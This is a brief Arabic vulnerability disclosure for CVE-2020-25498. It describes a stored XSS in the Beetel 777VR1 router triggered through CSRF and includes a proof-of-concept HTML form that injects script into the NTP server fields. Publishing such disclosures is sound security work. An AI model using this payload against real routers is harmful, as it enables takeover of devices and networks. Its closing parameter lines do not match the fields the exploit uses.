
Stored XSS عبر CSRF في راوتر Beetel 777VR1
تم تحديد أن نقطة النهاية الضعيفة لا تحتوي على التحقق من صحة الإدخال من جانب الخادم وتفتقر إلى التصفية من جانب العميل لأي حقن نص برمجي خبيث. يمكن للمهاجم استخدام هذه الثغرة لحقن نص برمجي خبيث في نقطة النهاية ويتم تنشيط النص البرمجي في كل مرة يفتح فيها المستخدم نقطة النهاية الضعيفة. يمكن للمهاجم إرسال رابط ضار مع حمولة طلب POST لتنفيذ XSS في وحدة الإدارة عبر CSRF للسيطرة على الجهاز وأخيرًا، للسيطرة على الشبكة.
الباحث: Sayli Ambure (https://twitter.com/sayli_ambure)
رابط CVE في MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
كود HTML لـ CSRF:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
المعامل: اسم الخادم
المعامل: الكلمة المفتاحية